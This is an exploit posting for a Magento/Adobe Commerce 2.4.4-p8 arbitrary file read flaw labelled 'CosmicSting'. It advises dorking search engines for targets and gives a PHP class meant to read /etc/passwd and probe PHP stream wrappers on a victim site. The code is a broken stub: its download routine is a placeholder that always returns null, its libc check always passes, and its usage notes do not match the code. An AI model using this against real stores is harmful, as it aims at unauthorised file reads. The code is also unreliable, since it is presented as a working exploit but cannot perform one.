=============================================================================================================================================
| # Title     : Magento Adobe Commerce 2.4.4-p8 arbitrary file read Vulnerability                                                           |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 131.0.3 (64 bits)                                                            |
| # Vendor    : https://experienceleague.adobe.com/en/docs/commerce-operations/release/notes/security-patches/2-4-4-patches                 |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] CosmicSting: Magento Arbitrary File Read in the iconv() function of glibc .

[+] save code as poc.php .

[+] Line 83 : set your target.

[+] USage : cmd => c:\www\test\php poc.php target.dz

[+] PayLoad :

<?php
class CosmicStingExploit {
    private $targetUrl;
    private $downloadFileTimeout = 10;

    public function __construct($url) {
        $this->targetUrl = $url;
    }

    public function check() {
        echo "Setting up module...\n";

        if ($this->checkMagento() && $this->checkPhpRequirements() && $this->checkLibcVersion()) {
            echo "Exploit preconditions met. Target appears to be vulnerable.\n";
        } else {
            echo "Exploit preconditions not met. Target may be safe.\n";
        }
    }

    private function checkMagento() {
        $etcPassword = $this->downloadFile('/etc/passwd');
        if ($etcPassword === null) {
            echo "Unable to download /etc/passwd.\n";
            return false;
        } else {
            echo "/etc/passwd downloaded successfully.\n";
            return true;
        }
    }

    private function checkPhpRequirements() {
        $text = bin2hex(random_bytes(25));
        $base64Text = base64_encode($text);
        $dataWrapper = "data:text/plain;base64,{$base64Text}";

        if ($this->downloadFile($dataWrapper) === $text) {
            echo "Data wrapper is working.\n";
        } else {
            echo "Data wrapper not working.\n";
            return false;
        }

        $filterWrapper = "php://filter//resource=data:text/plain;base64,{$base64Text}";

        if ($this->downloadFile($filterWrapper) === $text) {
            echo "Filter wrapper is working.\n";
        } else {
            echo "Filter wrapper not working.\n";
            return false;
        }

        $compressedText = $this->compress($text);
        $compressedBase64 = base64_encode($compressedText);
        $zlibPath = "php://filter/zlib.inflate/resource=data:text/plain;base64,{$compressedBase64}";

        if ($this->downloadFile($zlibPath) === $text) {
            echo "Zlib extension is enabled.\n";
            return true;
        } else {
            echo "Zlib extension not enabled.\n";
            return false;
        }
    }

    private function checkLibcVersion() {
        // Placeholder for libc version check implementation
        return true;
    }

    private function downloadFile($filePath) {
        // This function should simulate a download attempt using HTTP requests
        echo "Attempting to download {$filePath}\n";
        // Placeholder to simulate download success or failure
        return null; // Replace with actual download logic
    }

    private function compress($data) {
        return gzdeflate($data, 9);
    }
}

// Usage
$exploit = new CosmicStingExploit("http://target-application-url.com");
$exploit->check();


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================